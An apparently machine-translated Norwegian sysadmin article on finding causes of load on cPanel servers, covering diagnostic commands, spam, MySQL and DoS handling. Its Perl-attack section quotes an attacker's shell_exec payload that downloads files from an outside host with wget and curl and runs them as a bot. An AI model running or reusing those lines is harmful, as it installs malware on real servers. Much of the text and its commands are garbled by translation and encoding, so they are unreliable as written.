Load Tackling i Cpanel Servers

Som vi alle vet, er server stabilitet direkte avhengig server¬ † belastning. Basert på min erfaring som en Linux Server Administrator i cPanel servere, er I¬ † skriver denne artikkelen for å dele noen av mine ideer om lasten tackling.¬ † Load, i databehandling, er en "mål på mengden av behandlingen et datasystem er i dag utfører, vanligvis i form av en skalar og som litt variasjon på en prosent, "¬ † ifølge Wikipedia.This artikkelen fokuserer hovedsakelig på å finne årsakene til belastning.

Last Sjekker Kommandoer

Her er noen velbrukte last sjekke kommandoer:

w

Her ser hvem som er logget på og hva de gjør, for eksempel :

 07: 28: 29¬ † opp 41 dager, 20: 41, ¬ † 2 brukere, ¬ † last gjennomsnitt: 0,03, 0,09, 0,08 
 Server Time - 07:28:29 ¬ † Server Uptime -¬ † opp 41 dager, 20: 41hrs No: brukere innlogget: 2 brukere 
 Last Gjennomsnitt: 0.03,0.09, 0.08 
 1minute Oppfyllingen †: 0,03 Siste 5 Min Load Gjennomsnittlig: ¬ † 0,09 Siste 15 Min Load Gjennomsnittlig: 0.08¬ † 
oppetid

Samme som kommando w, men oppetid vil ikke vise detaljene brukere

pstree

Viser et tre av processes.¬ †

 pstree -apu 

er mer nyttig i å kontrollere prosessen listen. Du kan få enn videre † detaljer fra man-sidene.

toppen

For å se kjørende prosesser.

mysqladmin proc stat¬ †

Viser gjeldende mysql prosessen detaljer

Årsaker til Load

Noen årsaker til belastning er:. ¬ †

Høy bruk av noen prosesser

Perl-skript angrep

Spamming¬ †

PHP-skript forårsaker belastning

MySQL misbruk

DOS angrep

De fleste problemer med misbruk i serveren kan bli funnet i den forrige "Load Kontrollere Commands" -delen.

Høy Bruk av noen prosesser
Du kan finne det ved hjelp av kommandoen "top-c 'og' pstree -apu '. Installer CSF og konfigurere den til å få varsler på Angi e-postadressen din i denne filen "Overdreven ressursbruk.": /etc/csf/resalert.txt¬†
Perl Script Angrep
Disse angrepene er vanligvis forårsaket av dårlig koding eller sårbarheter i programvare-versjoner. Hvis disse Perl-skript kjører du kan se noe som ligner på under etter å ha kjørt 'pstree -apu':

 ===========, îú,îÄperl, 30478, bruker ¬ †, îǬ † ¬ †, îî,îÄsh, 30479 -c ekko \\\\ 040 \\ "` uname \\\\ 040-en` \\ "; echo \\\\ 040 \\" `id` \\"; /bin /sh ¬ † ¬ †, îǬ † ¬ † ¬ † ¬ † ¬ † ¬ †, îî,îÄsh, 30485 =========== Hvordan finne kilden til Perl: 
 root @ server [~] $ ls -alh /proc /30478 | grep CWD 
 ========== 
 lrwxrwxrwx¬ † ¬ † ¬ † en user¬ † user¬ † ¬ † ¬ † ¬ † ¬ † ¬ † ¬ † 0 september 28 06: 16¬ † CWD -> /home /bruker /public_html /media /
 =========== Du kan se Perl-skript som kjører fra "/home /bruker /public_html /media /" mappe. Et eksempel Perl-skript kan se ut som dette eksempelet: 
 =========== wget http://webstorch.com/a;chmod + xa, MV et sess_vttn737j6k0mci66akhs5u1261398401; ./sess_vttn737j6k0mci66akhs5u1261398401; rm a * \\ '); shell_exec (\\ 'cd /tmp; curl -O http://webstorch.com/botek.txt;mv botek.txt .sessx, perl .sessxt; rm botek.txt *; curl -O http:. //webstorch. com /a; chmod + xa, MV et sess_vttn737j6k0mci66akhs5u1261398401; ./sess_vttn737j6k0mci66akhs5u1261398401; rm a * \\ '); ============= 
 Dessuten kan du bruke kommandoen "lsof -p 30478 | less" for å få mer information.Preventive tiltak for å blokkere slike Perl angrep inkluderer: 

Deaktiver allow_url_fopen og allow_url_include i php.ini (/usr/local/lib/php.ini)  fil

Deaktiver følgende funksjoner i PHP: disable_functions = exec, shellexec, passthru, system, escapeshellcmd, escapeshellarg

Installer mod_security (dette hjelper også til å redusere Iframe angrep)

Spamming
Spamming kan enten innkommende eller outgoing.Incoming spamming kan være konsentrert til noen domene eller noen e-postkontoer .most om innkommende spamming er forårsaket på grunn av catch-all blir satt som hoved account.¬ † Hvis catch-all for domenet ditt er satt til hovedkonto, sett den som fail.¬ † Hvordan sette catch-all for nye domener i Cpanel Server: WHM >> Hoved >> Server Configuration >> Tweak Innstillinger: Under Mail sectionDefault catch-all /default adresse oppførsel for nye kontoer. "fail" er vanligvis det beste valget hvis du får mail attacks.Also, aktiverer RBL og spamassasin alternativer i WHM >> hoved >> Exim ConfigurationFor avtroppende spamming, kan enkelte brukere skal bruke (bevisst eller ikke) noen PHP-skript for å prøve å sende spam mails.¬ † Du kan finne kilden til PHP-skript ved hjelp av kommandoen "ps-C exim -fh ewww | grep home'.¬ † ¬ † ¬ † Forebyggende tiltak for spam blokkering inkluderer:

Limit e-post som kan sendes

Tweak postinnstillingene som følger:. ¬ † WHM >> Hoved >> Server Configuration >> Tweak Innstillinger: Under Mail delen

Den maksimale hvert domene kan sende ut per time (0 er ubegrenset): 300¬ †
Noen nyttige exim kommandoer inkluderer: exim -bp¬ † ¬ † ¬ † ¬ † ¬ † ¬ † ¬ † ¬ † ¬ † (For å vise køen) exim -bpc¬ † ¬ † ¬ † ¬ † ¬ † ¬ † ¬ † ¬ † ¬ † (Greve av post køen) ps -C exim -fh ewww (For å finne script kilder) exim -bp | exiqsumm (For å få full exim kø sammendrag) exiqgrep -z -i | xargs Exim -Mrm (Fjern alle frosne meldinger)
PHP-skript forårsaker Load
Dette kan være lett funnet gjennom resultatene av "pstree APU" og "top -c" kommandoer under last pigger.
MySQL Misbruk
Du kan spore opp MySQL bruk ved hjelp av kommandoen 'mysqladmin proc stat'
DOS angrep (Denial of Service)
Ved navn alene, vi vet hva dette betyr. fornektelse av tjenester som httpd, exim , ftp, etc.¬ † meste vi avtale med DOS angrep på Apache tjenester, noe som fører nettsider for å bremse ned eller ikke laste i det hele tatt. En DOS-angrep betyr høye tilkoblinger fra viss en IP-adresse eller IP-adresser. Vi kan lett finne high-tilkobling IP ved å bruke "netstat" kommando og blokkere de IP-adresser ved hjelp firewalls.The kommando for notering IPer og antall tilkoblinger er:
 ¬ † netstat -Plan | grep: 80 | awk '{print $ 5} '| cut -d: -f1 | sort | uniq -c | sort -nThe kommando for å finne den totale tilkoblinger er: 
 ¬ † netstat -Plan | grep: 80 | wc -l 

Hvis du gjør finne noen IP-adresse unormalt tilkoblinger (mer enn 50), så må du blokkere det enten ved å bruke iptables, APF, eller CSF.Using iptables, du kan blokkere en IP ved å utstede kommandoen:

 iptables - A¬ † INPUT -s --dport 80 -p tcp -j DROP 
 /etc/rc.d/init.d/iptables saveUsing APF, denne kommandoen brukes: 
 APF -d IPUsing CSF: 
 CSF -d IPDDOS er distribuert denial of service, som er en avansert DOS angrep. Antall tilkoblinger fra en indvidual IP kan være lav, men forbindelsene vil være fra mange IP-adresser eller spekter av IP-adresser. Mesteparten av tiden angrep vil bli konsentrert til en domene. I slike tilfeller drepe dns av domenet for å redusere attack.Preventive tiltak for DDOS-angrep inkluderer: 

Installer brannmurer som APF eller CSF og konfigurere dem til å blokkere de høye tilkoblings IPer

Installer mod_dosevasive. modul (bare under DOS angrep)

Konklusjon
Som vi alle vet, "forebygging er bedre enn kur", så alltid ta nødvendige forebyggende tiltak og holde revisjon og overvåking av servere.

Install¬ † System Integrity Monitor (SIM) eller CSF og konfigurere den til å få varsler på last pigger.

Oppdater gammel og sårbar programvare.

Ta de nødvendige forebyggende tiltak til unngå belastning spiking.

Sikre dine servere og finpusse programvare som apache, exim, etc for bedre ytelse.